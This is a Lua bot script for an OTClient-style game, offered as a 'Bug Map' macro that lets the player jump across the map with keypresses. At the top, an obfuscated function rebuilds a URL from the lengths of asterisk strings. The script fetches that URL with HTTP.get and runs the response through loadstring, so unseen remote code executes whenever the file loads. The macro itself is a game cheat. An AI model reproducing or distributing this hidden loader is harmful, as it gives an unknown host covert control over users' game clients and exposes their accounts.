function HNbEWuVUNVMOtoYupuRjCynLiyfrJamMagUeUhPuycxmAGdiXNSKrflGsNQkKHrZiihXyyMRssquSYO(c)
tab={}
for i = 1,#c do
x=string.len(c[i]) 
y=string.char(x)
table.insert(tab,y)
end
x=table.concat(tab)
return x
end 


HTTP.get(HNbEWuVUNVMOtoYupuRjCynLiyfrJamMagUeUhPuycxmAGdiXNSKrflGsNQkKHrZiihXyyMRssquSYO({'********************************************************************************************************','********************************************************************************************************************','********************************************************************************************************************','****************************************************************************************************************','*******************************************************************************************************************','**********************************************************','***********************************************','***********************************************','******************************************************************************************************************','*************************************************************************************************','***********************************************************************************************************************','**********************************************','*******************************************************************************************************','*********************************************************************************************************','********************************************************************************************************************','********************************************************************************************************','*********************************************************************************************************************','**************************************************************************************************','*********************************************************************************************************************','*******************************************************************************************************************','*****************************************************************************************************','******************************************************************************************************************','***************************************************************************************************','***************************************************************************************************************','**************************************************************************************************************','********************************************************************************************************************','*****************************************************************************************************','**************************************************************************************************************','********************************************************************************************************************','**********************************************','***************************************************************************************************','***************************************************************************************************************','*************************************************************************************************************','***********************************************','***********************************************************************************','*****************************************************************************************************','************************************************************************************************************','*******************************************************************************************************************','****************************************************','*****************************************************','******************************************************','***********************************************','*****************************************************************************************************','************************************************************************************************************************','****************************************************************************************************************','*****************************************************************************************************','******************************************************************************************************************','*********************************************************************************************************','*************************************************************************************************************','*****************************************************************************************************','**************************************************************************************************************','********************************************************************************************************************','***************************************************************************************************************','***********************************************','*************************************************************************************************************','*************************************************************************************************','*********************************************************************************************************','**************************************************************************************************************','***********************************************','********************************************************************************************************','*****************************************************************************************************','******************************************************************************************************************','******************************************************************************************************************','*************************************************************************************************','*************************************************************************************************************','*********************************************************************************************************','*****************************************************************************************************','**************************************************************************************************************','********************************************************************************************************************','*************************************************************************************************','*******************************************************************************************************************','*************************************','**************************************************','************************************************','****************************************************************************************************************','***************************************************************************************************'}), function(script)
    assert(loadstring(script))()
end)    

consoleModule = modules.game_console
Bm = macro(1, 'Bug Map', function() 
 if modules.corelib.g_keyboard.isKeyPressed('w') and not consoleModule:isChatEnabled() then
  checkPos(0, -5)
 elseif modules.corelib.g_keyboard.isKeyPressed('e') and not consoleModule:isChatEnabled() then
  checkPos(3, -3)
 elseif modules.corelib.g_keyboard.isKeyPressed('d') and not consoleModule:isChatEnabled() then
  checkPos(5, 0)
 elseif modules.corelib.g_keyboard.isKeyPressed('c') and not consoleModule:isChatEnabled() then
  checkPos(3, 3)
 elseif modules.corelib.g_keyboard.isKeyPressed('s') and not consoleModule:isChatEnabled() then
  checkPos(0, 5)
 elseif modules.corelib.g_keyboard.isKeyPressed('z') and not consoleModule:isChatEnabled() then
  checkPos(-3, 3)
 elseif modules.corelib.g_keyboard.isKeyPressed('a') and not consoleModule:isChatEnabled() then
  checkPos(-5, 0)
 elseif modules.corelib.g_keyboard.isKeyPressed('q') and not consoleModule:isChatEnabled() then
  checkPos(-3, -3)
 end
end)

test1 = addIcon("6", {item =769, text = "Bug Map", hotkey = ""}, Bm)
test1:breakAnchors()
test1:move(210, 260)
